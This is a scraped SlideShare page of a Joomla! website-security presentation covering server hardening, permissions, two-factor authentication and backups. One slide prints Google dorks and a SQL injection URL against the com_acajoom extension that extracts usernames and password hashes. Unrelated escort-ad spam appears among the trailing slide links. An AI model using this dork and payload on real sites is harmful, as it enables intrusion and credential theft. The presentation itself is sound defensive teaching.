SlideShare une entreprise Scribd logo

Joomla! Security Checklist for Websites

Télécharger en tant que PPTX, PDF
Shaiffulnizam Mohamad
Shaiffulnizam Mohamad

This document discusses securing Joomla websites from hacking. It recommends updating the server operating system, software and Joomla regularly. Hardening the server involves securing Apache, PHP and MySQL as well as adding firewalls and malware detection. Using a content delivery network can prevent DDoS attacks and stop hackers. The Joomla security checklist includes changing admin passwords, limiting super user access, protecting files, removing unused extensions and using two-factor authentication. Monitoring the site, regular backups and knowing how to restore from backups prepares for potential hacking incidents.

Technologie
1  sur  53
By Shaiffulnizam Mohamad JOOMLA! SECURITY ...Security is a moving target, so today's expert might be tomorrow's victim...
Joomla! Website’s hacked?
Definition of “Hacker” • Someone who deliberately seeks to bypass a server’s security • Black, grey, white hats • A hacked site is a broken/compromised site • A skilled computer programmer • A hacked site is a tweaked and improved site • A script kiddie • Junior hacker using other hacker’s tools and techniques
Hacking Motives? • To see if they can • To create mayhem • For social standing in the sub-culture • For political reasons – hacktivism • For financial reasons • Theft – steal ebooks, videos, games, online services etc • Sell data – user profiles, credit card details etc • Industrial sabotage - paid to break competitor sites • Set up zombie farms • Steal bandwidth • Host phishing pages • Collect passwords
How do we know that we’ve been hacked? • Site trashed • Hacking message • High bandwidth use • Changed admin password • New user with admin rights • Server logs
Why do we care about computer security?
No ONE is SAFE!Type of site Motivation Any site To see if they can To create mayhem Social standing Post political messages Zombie farms Steal bandwidth Host phishing pages Any membership site Sell user profiles to marketers Obtain usernames and passwords Some ecommerce sites Sell credit card details to thieves Sell order history and contact details to marketers
Why worry about being hacked? • Sites are targeted at random • Hacking is actually quite easy • Vulnerable sites are easy to find • Vulnerable sites are easy to hack • Fixing hacked sites is quite tricky • Hacks can be invisible • Clients may not notice a hacked site for some time • Finding a clean backup may be impossible • Determining what has been done can be really hard • May be difficult to restore • Hardening site to avoid future hacks requires skill and focus
Why worry about being hacked? Hacked sites are a big problem • Business reputation • Angry clients • Site shutdown by host • Loss of business • Data theft
Hacking Joomla! sites
Is Joomla! Sites easy to hack?• Yes and No • Joomla has to strike a balance between security and ease of use • Joomla an attractive target for hackers • The critical mass of sites • Large amateur web developer user base • Extensions have variable security • The site must be vulnerable
How do they hack? 1. Find a vulnerability (and instructions on how to exploit it) 2. Find a vulnerable site 3. Hack the site
1st Finding vulnerability • Security sites • www.exploit-db.com, www.secunia.com • Various hacking sites/forums • Joomla vulnerable extensions list • docs.joomla.org/Vulnerable_Extensions_List
2nd find a vulnerable sites• Google Dork - a search phrase to find vulnerable sites • PHPInfo • intitle:phpinfo() • Vulnerable extensions • allinurl:com_acajoom
3rd cut n paste code! http://xxxxxxxxxxxxxxxxx/index.php?option=com_acajoom &act=mailing&task=view&listid=1&Itemid=1&mailingid=1/* */union/**/select/**/1,1,1,1,concat(username,0x3a,passw ord),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/from/**/jos_users/* */LIMIT/**/1,1/*
Sometimes… RFI = Remote file inclusions Executing SHELL Files and taking control of the Server
What should we do to prevent? • Server operating system • Server Software • PHP + MySQL  Joomla  Extensions  Users and their behaviour Joomla! Security Involves
What should we do to prevent? 1. Updating Your Server Operating System 2. Update your Server Software e.g. Apache, Nginx, IIS, Litespeed etc 3. Update Your PHP & MySQL Server 4. Secure Your Server Security Action plan
[1] Basic actions [2] More complex actions [3] Actions that require significant modification rights on the server (unless already implemented by default) Image by echiner1 What should we do to prevent?
Joomla! Security Server ~ shared, VPS and Dedicated • A shared server • Your site(s) live in the same hosting space as other sites that you do not administer • This is the cheapest hosting option. • No say over the security of the other sites on the server • Old shared server is the worst location for your hosting • A Virtual Private Server • Better than shared • Still can’t change many settings
Joomla! Security Server ~ shared, VPS and Dedicated • A dedicated server • Allow you to upgrade and tweak all the settings on a dedicated server • Host retains responsibility for maintenance
Joomla! Security Server ~ Security 1. The underlying Operating System must be updated 2. Updating the Webserver e.g. Apache, Nginx etc 3. Updating the PHP and MySQL 4. Securing the Above 5. Installing additional Security layers
Joomla! Security Server ~ Security Hardening 1. Securing Apache Webserver Adding web headers to block XSS etc. <IfModule mod_headers.c> Header set X-XSS-Protection: "1; mode=block" Header set X-Content-Security-Policy: "allow 'self'; options inline-script; img$ Header set Strict-Transport-Security: "max-age=43200; includeSubDomains" Header set Cache-Control: "max-age=3600, public, must-revalidate" Header set X-frame-options: "deny" Header set X-Content-Type-Options: "nosniff" #Header set X-Content-Security-Policy: "default-src 'self'" Header unset X-Powered-By Header unset X-Pingback </IfModule> 2. Hide Server Signature
Joomla! Security Server ~ Security Hardening 3. Activating .htaccess override in Apache conf • .htaccess files • [1] Activate the htaccess file in the Joomla root • [1] Use an .htpasswd for the /administrator/ folder • [3] Advanced .htaccess files
Joomla! Security Server ~ Security Hardening 1. Hardening PHP with SUHOSIN 2. Use PHP Disable function show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open 3. Do not expose PHP Version expose_php = off 4. Use open_basedir (restriction file handling functions)
Joomla! Security Server ~ Security Hardening • Globally reset all files • Owner – AccountUsername:AccountUsername chown -R user:group * • Files – 644 find . -type f -exec chmod 644 {} ; • Folders – 755 find . -type d -exec chmod 755 {} ; Use suPHP PHP files are run under the user of the website instead of the Apache user
Joomla! Security Server ~ Security Hardening 1. Hardening MySQL server 2. Disable access from outside (allow local connections) 3. Make sure using Password or after setup, run mysql_secure_installation command
Joomla! Security Server ~ Additional Security Hardening 1. Add additional firewall e.g. CSF firewall 2. Add modsecurity firewall ~ apache module that helps to protect your website from various attacks. It is used to block commonly known exploits by use of regular expressions and rule sets 3. Install Malware detector such as maldet 4. Install rootkit detector 5. Install fail2ban / IDS (intrusion detector)
Joomla! Security Use CDN for security 1. Prevent DDOS 2. Stop Hackers 3. Secure website from attack
Joomla! Security Use CDN for security 1. Prevent DDOS 2. Stop Hackers 3. Secure website from attack
Joomla! Security Use CDN for security
Joomla! Security Use CDN for security
Joomla! Security Checklisthttps://docs.joomla.org/Security
Upgrade to the latest stable version of Joomla! as soon as possible. Download Joomla! from official sites only, such as JoomlaCode.org, and check the MD5 hash. Use Web Page Diagnostic Tools, i.e. Firefox Firebug, IE Web Developer Toolbar, Opera Dragonfly, etc. to ensure that all files were installed correctly. Joomla! Security Checklisthttps://docs.joomla.org/Security Install official versions of Joomla! http://www.joomla.org/download.html Install official Updates from Joomla! To avoid breaking your site, search the forums for reports of incompatible extensions before upgrading to a new version of Joomla.
Joomla! Security Checklisthttps://docs.joomla.org/Security Default administrator username Change the user name of the default admin user. This simple step effectively increases the security of this critical account 50% by modifying one of the two variables attackers must know to gain access. Never use easy to guess passwords, avoid at no cost. e.g. admin123, passwords, 123456 Use mix characters (upper and lower case) with special characters. e.g F1$hn3Tw0Rk, use more than 8 digits Administrator passwords
Joomla! Security Checklisthttps://docs.joomla.org/Security Limit superadmin Less superadmin, mean less problem Disable registration, if you are not running social sites, or if your website is limited to your employee If you are not running Social site, disable registration
Joomla! Security Checklisthttps://docs.joomla.org/Security Protecting directories and files All configurable path must be rewritable Must never use chmod 777, chmod 755 is sufficient for directories and 644 for files. Use .htaccess to disable directories such as images and download from running php files. # secure directory by disabling script execution AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi Options -ExecCGI
Joomla! Security Checklisthttps://docs.joomla.org/Security Remove all unneeded files and extensions All unneeded and unused files and extensions must be remove In general, do not leave any unneeded files (compressed or otherwise) on a public server. Each unused (and perhaps long forgotten) file is a potential security hole.
Joomla! Security Checklisthttps://docs.joomla.org/Security Installing Joomla! Extensions 1. Always backup 2. Check for extension vulnerabilities 3. Download from trusted site 4. Check code quality of the extensions 5. Test on development site 6. Remove junk 7. Avoid encrypted code
Joomla! SecurityHow to secure Joomla! [1] SEF all URLs [2] Clear the default Joomla metatags [3] Clear the default Home page title [4] Remove generator tag [5] Change favicon [6] Hide component credits Less information provided about Joomla!, means much difficult to attack
Joomla! SecurityHow to secure Joomla! Two-Factor Authentication is a login method whereby a person has to provide his/her user name, password and a random generated OTP (One Time Password). OTP is six numeric digit code, generated by cryptographic functions in a short interval. Even if a hacker was to guess your Joomla Administrator username and password correctly, they would still require the OTP to login. To enabled Two-Factor Authentication requires Joomla 3.2.0 or higher. 1.Login into the Administration area. 2.Click on Components >> Post-installation Messages. 3.Click on Enable two-factor authentication. 4.Install a Google Authenticator compatible client for your device. Implement 2 factor Authentication
Joomla! SecurityHow to secure Joomla! Trying to inject spam content onto your site Targets Joomla core forms and extension forms Use captcha to fight against automated spammers
Joomla! SecurityHow to secure Joomla! Use security extensions
Joomla! SecurityHow to secure Joomla! Disable FTP access from Joomla! • If a hacker can obtain your FTP password, they can login as you, bypassing almost every security barrier. • FTP passwords are stored unencrypted in your FTP program! • FTP authentication details pass unencrypted to the server! • There are several common FTP apps that store their passwords in a standard location with a standard name!
Joomla! SecurityHow to secure Joomla! Change temporary folder and logs path
Joomla! SecurityHow to secure Joomla! Make sure to check for Joomla!/extensions Update
Joomla! SecurityHow to secure Joomla! Preparing for the Worst Are you ready?
Joomla! SecurityHow to secure Joomla! Preparing for the Worst 1. Site monitoring 2. Joomla site backups 3. Restoring a hacked site
Joomla! Security Site monitoring • Diagnostics • Site down • Home page content changes • Mod_security logs (shows attempts) • Bandwidth use • Spam blacklisting • [3] Searching and browsing server logs
Joomla! Security Joomla! Backup • Why backup? • When should I backup my Joomla! site? • How often should I backup my Joomla! site? • How to backup?
Joomla! Security Joomla! Backup How to backup? 1. Manual backup through command line. (database) 2. Using extensions such as Akeeba Backup, EJB and XCloner What to backup? 1. All files 2. Images or docs REMEMBER TO TEST YOUR BACKUP
• Fixes the obvious problems • Does not address: • Hidden hacks • Shell scripts • Backdoors • Zombies • Continuing vulnerabilities • Impacts of data exposure Photo: flickr.com/photos/andreweason Joomla! Security
The End Shaiffulnizam Mohamad OWASP Members since 2010 Involved in all Joomla Day Malaysia since 2007 Specializing in Joomla! And Security. shaifful.md@gmail.com / 0129531452 Joomla! Security

Recommandé

Joomla! security jday2015
Joomla! security jday2015Joomla! security jday2015
Joomla! security jday2015kriptonium
 
8 Ways to Hack a WordPress website
8 Ways to Hack a WordPress website8 Ways to Hack a WordPress website
8 Ways to Hack a WordPress websiteSiteGround.com
 
Securing Drupal 7: Do not get Hacked or Spammed to death!
Securing Drupal 7: Do not get Hacked or Spammed to death!Securing Drupal 7: Do not get Hacked or Spammed to death!
Securing Drupal 7: Do not get Hacked or Spammed to death!Adelle Frank
 
Top Ten WordPress Security Tips for 2012
Top Ten WordPress Security Tips for 2012Top Ten WordPress Security Tips for 2012
Top Ten WordPress Security Tips for 2012Brad Williams
 
Drupal Security Hardening
Drupal Security HardeningDrupal Security Hardening
Drupal Security HardeningGerald Villorente
 
Securing Your Moodle
Securing Your MoodleSecuring Your Moodle
Securing Your Moodlemoorejon
 
WordPress Security
WordPress SecurityWordPress Security
WordPress SecurityBrad Williams
 
10 Steps to Secure Wordpress Sites
10 Steps to Secure Wordpress Sites10 Steps to Secure Wordpress Sites
10 Steps to Secure Wordpress SitesAapna Infotech
 

Recommandé

Joomla! security jday2015
Joomla! security jday2015Joomla! security jday2015
Joomla! security jday2015kriptonium
 
8 Ways to Hack a WordPress website
8 Ways to Hack a WordPress website8 Ways to Hack a WordPress website
8 Ways to Hack a WordPress websiteSiteGround.com
 
Securing Drupal 7: Do not get Hacked or Spammed to death!
Securing Drupal 7: Do not get Hacked or Spammed to death!Securing Drupal 7: Do not get Hacked or Spammed to death!
Securing Drupal 7: Do not get Hacked or Spammed to death!Adelle Frank
 
Top Ten WordPress Security Tips for 2012
Top Ten WordPress Security Tips for 2012Top Ten WordPress Security Tips for 2012
Top Ten WordPress Security Tips for 2012Brad Williams
 
Drupal Security Hardening
Drupal Security HardeningDrupal Security Hardening
Drupal Security HardeningGerald Villorente
 
Securing Your Moodle
Securing Your MoodleSecuring Your Moodle
Securing Your Moodlemoorejon
 
WordPress Security
WordPress SecurityWordPress Security
WordPress SecurityBrad Williams
 
10 Steps to Secure Wordpress Sites
10 Steps to Secure Wordpress Sites10 Steps to Secure Wordpress Sites
10 Steps to Secure Wordpress SitesAapna Infotech
 
WordPress Security Tips
WordPress Security TipsWordPress Security Tips
WordPress Security TipsCatch Themes
 
Security talk: Fortifying your Joomla! website
Security talk: Fortifying your Joomla! websiteSecurity talk: Fortifying your Joomla! website
Security talk: Fortifying your Joomla! websiteSigsiu.NET
 
Hack Proof Your Drupal Site
Hack Proof Your Drupal SiteHack Proof Your Drupal Site
Hack Proof Your Drupal SiteNaveen Valecha
 
LAMP security practices
LAMP security practicesLAMP security practices
LAMP security practicesAmit Kejriwal
 
WordPress Security Updated - NYC Meetup 2009
WordPress Security Updated - NYC Meetup 2009WordPress Security Updated - NYC Meetup 2009
WordPress Security Updated - NYC Meetup 2009Brad Williams
 
How to install and configure lamp (linux,apache mysql mariadb,php) with jooml...
How to install and configure lamp (linux,apache mysql mariadb,php) with jooml...How to install and configure lamp (linux,apache mysql mariadb,php) with jooml...
How to install and configure lamp (linux,apache mysql mariadb,php) with jooml...CloudMinister Technologies Pvt. Ltd
 
Securing WordPress by Jeff Hoffman
Securing WordPress by Jeff HoffmanSecuring WordPress by Jeff Hoffman
Securing WordPress by Jeff HoffmanJeff Hoffman
 
Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertComplete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertChetan Soni
 
Wamp & LAMP - Installation and Configuration
Wamp & LAMP - Installation and ConfigurationWamp & LAMP - Installation and Configuration
Wamp & LAMP - Installation and ConfigurationChetan Soni
 
Introduksjon til web sikkerhet
Introduksjon til web sikkerhetIntroduksjon til web sikkerhet
Introduksjon til web sikkerhetHelge Sverre Hessevik Liseth
 
WordPress MU 101
WordPress MU 101WordPress MU 101
WordPress MU 101Pete Mall
 
Protect Your WordPress Website - Setting Up IThemes Security
Protect Your WordPress Website - Setting Up IThemes SecurityProtect Your WordPress Website - Setting Up IThemes Security
Protect Your WordPress Website - Setting Up IThemes SecurityRed8 Interactive
 
WordPress End-User Security
WordPress End-User SecurityWordPress End-User Security
WordPress End-User SecurityDre Armeda
 
Wordpress security issues
Wordpress security issuesWordpress security issues
Wordpress security issuesDeepu Thomas
 
Session wp
Session wpSession wp
Session wpdenish38
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Krzysztof Kotowicz
 
GDPR and EA Commissioning a web site Part 6 of 8
GDPR and EA Commissioning a web site Part 6 of 8GDPR and EA Commissioning a web site Part 6 of 8
GDPR and EA Commissioning a web site Part 6 of 8Allen Woods
 
Introduction of Ghost CMSGhost cms
Introduction of Ghost CMSGhost cmsIntroduction of Ghost CMSGhost cms
Introduction of Ghost CMSGhost cmsKhademulBasher
 
20 tips to Improving Your WordPress Site...for Beginners
20 tips to Improving Your WordPress Site...for Beginners20 tips to Improving Your WordPress Site...for Beginners
20 tips to Improving Your WordPress Site...for BeginnersTRB Design, Inc.
 
moodle on wamp
moodle on wampmoodle on wamp
moodle on wampSoliman ElSaber
 
OWASP Thailand 2016 - Joomla Security
OWASP Thailand 2016 - Joomla Security OWASP Thailand 2016 - Joomla Security
OWASP Thailand 2016 - Joomla Security Akarawuth Tamrareang
 
Brendon Hatcher Joomla Security
Brendon Hatcher Joomla SecurityBrendon Hatcher Joomla Security
Brendon Hatcher Joomla SecurityJoomla Day South Africa
 

Contenu connexe

Tendances

WordPress Security Tips
WordPress Security TipsWordPress Security Tips
WordPress Security TipsCatch Themes
 
Security talk: Fortifying your Joomla! website
Security talk: Fortifying your Joomla! websiteSecurity talk: Fortifying your Joomla! website
Security talk: Fortifying your Joomla! websiteSigsiu.NET
 
Hack Proof Your Drupal Site
Hack Proof Your Drupal SiteHack Proof Your Drupal Site
Hack Proof Your Drupal SiteNaveen Valecha
 
LAMP security practices
LAMP security practicesLAMP security practices
LAMP security practicesAmit Kejriwal
 
WordPress Security Updated - NYC Meetup 2009
WordPress Security Updated - NYC Meetup 2009WordPress Security Updated - NYC Meetup 2009
WordPress Security Updated - NYC Meetup 2009Brad Williams
 
How to install and configure lamp (linux,apache mysql mariadb,php) with jooml...
How to install and configure lamp (linux,apache mysql mariadb,php) with jooml...How to install and configure lamp (linux,apache mysql mariadb,php) with jooml...
How to install and configure lamp (linux,apache mysql mariadb,php) with jooml...CloudMinister Technologies Pvt. Ltd
 
Securing WordPress by Jeff Hoffman
Securing WordPress by Jeff HoffmanSecuring WordPress by Jeff Hoffman
Securing WordPress by Jeff HoffmanJeff Hoffman
 
Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertComplete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertChetan Soni
 
Wamp & LAMP - Installation and Configuration
Wamp & LAMP - Installation and ConfigurationWamp & LAMP - Installation and Configuration
Wamp & LAMP - Installation and ConfigurationChetan Soni
 
WordPress MU 101
WordPress MU 101WordPress MU 101
WordPress MU 101Pete Mall
 
Protect Your WordPress Website - Setting Up IThemes Security
Protect Your WordPress Website - Setting Up IThemes SecurityProtect Your WordPress Website - Setting Up IThemes Security
Protect Your WordPress Website - Setting Up IThemes SecurityRed8 Interactive
 
WordPress End-User Security
WordPress End-User SecurityWordPress End-User Security
WordPress End-User SecurityDre Armeda
 
Wordpress security issues
Wordpress security issuesWordpress security issues
Wordpress security issuesDeepu Thomas
 
Session wp
Session wpSession wp
Session wpdenish38
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Krzysztof Kotowicz
 
GDPR and EA Commissioning a web site Part 6 of 8
GDPR and EA Commissioning a web site Part 6 of 8GDPR and EA Commissioning a web site Part 6 of 8
GDPR and EA Commissioning a web site Part 6 of 8Allen Woods
 
Introduction of Ghost CMSGhost cms
Introduction of Ghost CMSGhost cmsIntroduction of Ghost CMSGhost cms
Introduction of Ghost CMSGhost cmsKhademulBasher
 
20 tips to Improving Your WordPress Site...for Beginners
20 tips to Improving Your WordPress Site...for Beginners20 tips to Improving Your WordPress Site...for Beginners
20 tips to Improving Your WordPress Site...for BeginnersTRB Design, Inc.
 

Tendances (20)

WordPress Security Tips
WordPress Security TipsWordPress Security Tips
WordPress Security Tips
 
Security talk: Fortifying your Joomla! website
Security talk: Fortifying your Joomla! websiteSecurity talk: Fortifying your Joomla! website
Security talk: Fortifying your Joomla! website
 
Hack Proof Your Drupal Site
Hack Proof Your Drupal SiteHack Proof Your Drupal Site
Hack Proof Your Drupal Site
 
LAMP security practices
LAMP security practicesLAMP security practices
LAMP security practices
 
WordPress Security Updated - NYC Meetup 2009
WordPress Security Updated - NYC Meetup 2009WordPress Security Updated - NYC Meetup 2009
WordPress Security Updated - NYC Meetup 2009
 
How to install and configure lamp (linux,apache mysql mariadb,php) with jooml...
How to install and configure lamp (linux,apache mysql mariadb,php) with jooml...How to install and configure lamp (linux,apache mysql mariadb,php) with jooml...
How to install and configure lamp (linux,apache mysql mariadb,php) with jooml...
 
Securing WordPress by Jeff Hoffman
Securing WordPress by Jeff HoffmanSecuring WordPress by Jeff Hoffman
Securing WordPress by Jeff Hoffman
 
Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertComplete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
 
Wamp & LAMP - Installation and Configuration
Wamp & LAMP - Installation and ConfigurationWamp & LAMP - Installation and Configuration
Wamp & LAMP - Installation and Configuration
 
Introduksjon til web sikkerhet
Introduksjon til web sikkerhetIntroduksjon til web sikkerhet
Introduksjon til web sikkerhet
 
WordPress MU 101
WordPress MU 101WordPress MU 101
WordPress MU 101
 
Protect Your WordPress Website - Setting Up IThemes Security
Protect Your WordPress Website - Setting Up IThemes SecurityProtect Your WordPress Website - Setting Up IThemes Security
Protect Your WordPress Website - Setting Up IThemes Security
 
WordPress End-User Security
WordPress End-User SecurityWordPress End-User Security
WordPress End-User Security
 
Wordpress security issues
Wordpress security issuesWordpress security issues
Wordpress security issues
 
Session wp
Session wpSession wp
Session wp
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)
 
GDPR and EA Commissioning a web site Part 6 of 8
GDPR and EA Commissioning a web site Part 6 of 8GDPR and EA Commissioning a web site Part 6 of 8
GDPR and EA Commissioning a web site Part 6 of 8
 
Introduction of Ghost CMSGhost cms
Introduction of Ghost CMSGhost cmsIntroduction of Ghost CMSGhost cms
Introduction of Ghost CMSGhost cms
 
20 tips to Improving Your WordPress Site...for Beginners
20 tips to Improving Your WordPress Site...for Beginners20 tips to Improving Your WordPress Site...for Beginners
20 tips to Improving Your WordPress Site...for Beginners
 
moodle on wamp
moodle on wampmoodle on wamp
moodle on wamp
 

Similaire à Joomla! Security Checklist for Websites

OWASP Thailand 2016 - Joomla Security
OWASP Thailand 2016 - Joomla Security OWASP Thailand 2016 - Joomla Security
OWASP Thailand 2016 - Joomla Security Akarawuth Tamrareang
 
8 Most Common Joomla! Hacks and How to Avoid Them
8 Most Common Joomla! Hacks and How to Avoid Them8 Most Common Joomla! Hacks and How to Avoid Them
8 Most Common Joomla! Hacks and How to Avoid ThemDaniel Kanchev
 
Secrets to a Hack-Proof Joomla Revealed
Secrets to a Hack-Proof Joomla RevealedSecrets to a Hack-Proof Joomla Revealed
Secrets to a Hack-Proof Joomla RevealedSiteGround.com
 
8 Most Popular Joomla Hacks & How To Avoid Them
8 Most Popular Joomla Hacks & How To Avoid Them8 Most Popular Joomla Hacks & How To Avoid Them
8 Most Popular Joomla Hacks & How To Avoid ThemSiteGround.com
 
WordPress Server Security
WordPress Server SecurityWordPress Server Security
WordPress Server SecurityPeter Baylies
 
Blog World 2010 - How to Keep Your Blog from Being Hacked
Blog World 2010 - How to Keep Your Blog from Being HackedBlog World 2010 - How to Keep Your Blog from Being Hacked
Blog World 2010 - How to Keep Your Blog from Being HackedBrian Layman
 
Making Joomla Insecure - Explaining security by breaking it
Making Joomla Insecure - Explaining security by breaking itMaking Joomla Insecure - Explaining security by breaking it
Making Joomla Insecure - Explaining security by breaking itTim Plummer
 
Web & Cloud Security in the real world
Web & Cloud Security in the real worldWeb & Cloud Security in the real world
Web & Cloud Security in the real worldMadhu Akula
 
WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013Thor Kristiansen
 
Attacking Drupal
Attacking DrupalAttacking Drupal
Attacking DrupalGreg Foss
 
Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Neo word press meetup ehermits - how to keep your blog from being hacked 2012Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Neo word press meetup ehermits - how to keep your blog from being hacked 2012Brian Layman
 
Drupal Security Intro
Drupal Security IntroDrupal Security Intro
Drupal Security IntroCash Williams
 
10 tips to improve your website security
10 tips to improve your website security10 tips to improve your website security
10 tips to improve your website securitySucuri
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Jim Manico
 
Protect Your WordPress From The Inside Out
Protect Your WordPress From The Inside OutProtect Your WordPress From The Inside Out
Protect Your WordPress From The Inside OutSiteGround.com
 
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) Hackable
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) HackableCollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) Hackable
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) HackableDarren Duke
 
Hack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security TrainingHack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security TrainingColdFusionConference
 
Building Secure WordPress Sites
Building Secure WordPress Sites Building Secure WordPress Sites
Building Secure WordPress Sites Catch Themes
 

Similaire à Joomla! Security Checklist for Websites (20)

OWASP Thailand 2016 - Joomla Security
OWASP Thailand 2016 - Joomla Security OWASP Thailand 2016 - Joomla Security
OWASP Thailand 2016 - Joomla Security
 
Brendon Hatcher Joomla Security
Brendon Hatcher Joomla SecurityBrendon Hatcher Joomla Security
Brendon Hatcher Joomla Security
 
8 Most Common Joomla! Hacks and How to Avoid Them
8 Most Common Joomla! Hacks and How to Avoid Them8 Most Common Joomla! Hacks and How to Avoid Them
8 Most Common Joomla! Hacks and How to Avoid Them
 
Secrets to a Hack-Proof Joomla Revealed
Secrets to a Hack-Proof Joomla RevealedSecrets to a Hack-Proof Joomla Revealed
Secrets to a Hack-Proof Joomla Revealed
 
8 Most Popular Joomla Hacks & How To Avoid Them
8 Most Popular Joomla Hacks & How To Avoid Them8 Most Popular Joomla Hacks & How To Avoid Them
8 Most Popular Joomla Hacks & How To Avoid Them
 
WordPress Server Security
WordPress Server SecurityWordPress Server Security
WordPress Server Security
 
Blog World 2010 - How to Keep Your Blog from Being Hacked
Blog World 2010 - How to Keep Your Blog from Being HackedBlog World 2010 - How to Keep Your Blog from Being Hacked
Blog World 2010 - How to Keep Your Blog from Being Hacked
 
Making Joomla Insecure - Explaining security by breaking it
Making Joomla Insecure - Explaining security by breaking itMaking Joomla Insecure - Explaining security by breaking it
Making Joomla Insecure - Explaining security by breaking it
 
Web & Cloud Security in the real world
Web & Cloud Security in the real worldWeb & Cloud Security in the real world
Web & Cloud Security in the real world
 
WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013
 
Attacking Drupal
Attacking DrupalAttacking Drupal
Attacking Drupal
 
Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Neo word press meetup ehermits - how to keep your blog from being hacked 2012Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Neo word press meetup ehermits - how to keep your blog from being hacked 2012
 
Drupal Security Intro
Drupal Security IntroDrupal Security Intro
Drupal Security Intro
 
10 tips to improve your website security
10 tips to improve your website security10 tips to improve your website security
10 tips to improve your website security
 
Secure wordpress
Secure wordpressSecure wordpress
Secure wordpress
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5
 
Protect Your WordPress From The Inside Out
Protect Your WordPress From The Inside OutProtect Your WordPress From The Inside Out
Protect Your WordPress From The Inside Out
 
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) Hackable
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) HackableCollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) Hackable
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) Hackable
 
Hack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security TrainingHack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security Training
 
Building Secure WordPress Sites
Building Secure WordPress Sites Building Secure WordPress Sites
Building Secure WordPress Sites
 

Dernier

Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
